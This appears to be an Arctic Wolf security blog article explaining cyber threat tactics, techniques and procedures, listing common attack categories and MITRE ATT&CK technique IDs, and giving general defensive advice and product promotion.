Microsoft PowerShell is a ubiquitous piece of software. It’s also, unfortunately, a major attack vector for threat actors. Once a threat actor has initial access into a network, they can utilize the commands and scripts components of PowerShell to conduct reconnaissance or inject fileless malware into the network. This activity is so common it’s continually listed as one of the top tactics, techniques, and procedures (TTPs).
TTPs, broadly speaking, explain how threat actors gain access to and move through a system, as well as how they successfully launch attacks and data breaches. TTPs are studied, analyzed, and adjusted by both the cybersecurity and cybercrime community and thus play a major role in the modern cyber landscape.
Understanding what TTPs are and the value they provide can be a major benefit to your organization’s security journey, in addition to helping your organization prioritize security posture improvements and implement better detection and response methods.
What Are Tactics, Techniques, and Procedures?
Tactics, Techniques, and Procedures (TTPs) refer to the patterns, activities, and methods of a threat actor or threat actor group. Simply, TTPs are how a cybercriminal conducts an attack.
There are three main parts to TTPs:
1. Tactics. Tactics are the high-level behavior and strategy of a threat actor or threat actor group. For example, a threat actor deciding to hold an organization for ransomware would be a tactic.
Common tactics include:
Reconnaissance
Delivery or exploitation
Objective actions
2. Techniques. Tactics are realized through techniques, which are more intermediary steps in a threat actor’s plan. For example, a threat actor sending a phishing email to try to gain credentials to a system or application would be a technique.
Common techniques include:
Network infiltration
Lateral movement
Malware launches
Data transfers or modifications
3. Procedures. Procedures are the specific steps a threat actor or threat actor group takes, utilizing a specific technique, to execute an attack tactic. Procedures are the most detailed and specific component of the three.
Because procedures are specific to a given incident, there is no set of common procedures. However, there are broader patterns of attacks we can identify, such as launching a social engineering campaign to gain credentials to encrypt a part of the network for a ransomware attack or utilizing stolen credentials to login to a user’s email account and launch a business email compromise (BEC) attack.
As technology changes, so do TTPs, and they are always evolving. A common TTP for threat actors years ago may not be in use anymore, while new TTPs are developing all the time. Take for example SEO poisoning, where a threat actor uses SEO best practices to get a fake site, often infected with malware, to appear at the top of a search query, making it appear legitimate. That TTP has only become possible — and more widespread — because of SEO evolutions.
Examples of TTPs
While TTPs may evolve and change over time, they are not infinite. Threat actors love to reuse TTPs that have worked in the past, preferring efficiency and success rates over innovation.
Common TTPs seen consistently can include:
- Phishing
- Supply chain compromise
- Remote code execution
- Account creation or manipulation
- Privilege escalation
- File encryption
- Malware execution
- Internal spear phishing (and other lateral movement techniques)
- Data exfiltration
- Network denial of service
- Firmware corruption.
This is just a small sample of the TTPs used by threat actors, which can vary depending on type of attack, behavior changes during the attack, and the industry or organization targeted. MITRE ATT&CK is the leading database of all current TTPs and is often used to develop threat models and understand past and future TTPs.
Lateral Movement: A Critical TTP
Lateral movement is a tactic threat actors use to move around a target’s environment to achieve their cyber attack goal. After initial access is achieved, a threat actor often needs to move into different parts of the system or go deeper into the system to exfiltrate data or execute another kind of attack.
Common lateral movement techniques include:
- Exploitation of remote services
- Internal spear phishing
- Lateral tool transfer
- Remote hijacking
- Remote desktop protocol
- Cloud service login
- Application access token
Learn more about lateral movement.
TTPs To Watch According to Arctic Wolf Labs
In Arctic Wolf’s annual Threat Report, we outlined five TTPs that could have a major impact on organizations. This data was taken from our real-world analysis of severe incidents, including incidents observed by Arctic Wolf® Incident Response.
Those five TTPS are:
- T1059.001 — Command and Scripting Interpreter: PowerShell
- T1105 — Ingress Tool Transfer
- T1047 — Windows Management Instrumentation
- T1027.010 — Obfuscated Files or Information: Command Obfuscation
- T1608.006 — Stage Capabilities: SEO Poisoning
Learn more about these specific TTPs, and the threats they create, with our 2024 Arctic Wolf Labs Threat Report.
TTPs’ Role in Cyber Threat Intelligence
TTPs play a critical role in the development of threat intelligence that informs cybersecurity technology people, and processes.
Cyber threat intelligence comprises three categories, one of which is tactical — primarily consisting of TTPs.
Those TTPs play a major role in proactive security for organizations, helping them understand the threat landscape and how it relates back to their organization. If threat actors are exploiting a certain vulnerability to launch ransomware attacks or exfiltrate data — as was the case with the MOVEit transfer vulnerability — understanding the specifics of that can be the difference between patching and swift detection and response or a severe incident.
General trends, predictions, and decisions are also predicated on current TTPs. From rapid triage and investigation to better threat detection, to industry or organization-specific threat monitoring, understanding TTPs can have various positive outcomes. TTPs also help establish an attack framework and can provide attribution, which allows incident responders to respond in a way that can de-escalate or stop an attack. For example, an unknown malware can be identified based on how it’s moving through a system, or a certain execution can be identified as belonging to a specific ransomware group based on this communal TTP knowledge.
See how Arctic Wolf’s detection and response uses multiple data points to identify and mitigate incidents.
How To Defend Against Common TTPs
Securing your environment against common TTPs is not a one-and-done task. Just as cybersecurity solutions are evolving, so are cybercriminals — shifting their behaviors, finding new vulnerabilities, and adding sophisticated steps to their attack patterns.
The best approach is holistic and has both proactive and reactive components such as vulnerability management and 24×7 monitoring, detection, and response.
A few ways for any organization to harden their attack surface and improve their security posture include:
- Understand your organization’s unique attack surface, including users, critical assets, applications, network structure, and endpoints.
- Gain or increase visibility into your environment, which will allow your organization to better detect and respond to threats before they become incidents. In addition, visibility allows for prioritization when it comes to proactive initiatives.
- Practice robust identity and access management, as threat actors are increasingly utilizing credentials and privileged access in attacks. This should include employing a zero-trust strategy.
- Prioritize your cloud environment, ensuring there are no security gaps or misconfigurations.
- Establish a culture of security. No IT department can do it alone, and while individual users can create risk in the attack surface, they can also help harden it, from identifying phishing emails to regularly updating their devices.
- Transfer risk by purchasing cyber insurance or an incident response retainer.
See Arctic Wolf’s cybercrime predictions for this year based on the TTPs of the past.
Explore how Arctic Wolf’s Security Operations Platform collects, enriches, and analyzes security data at scale to better detect and respond to organization-specific threats.
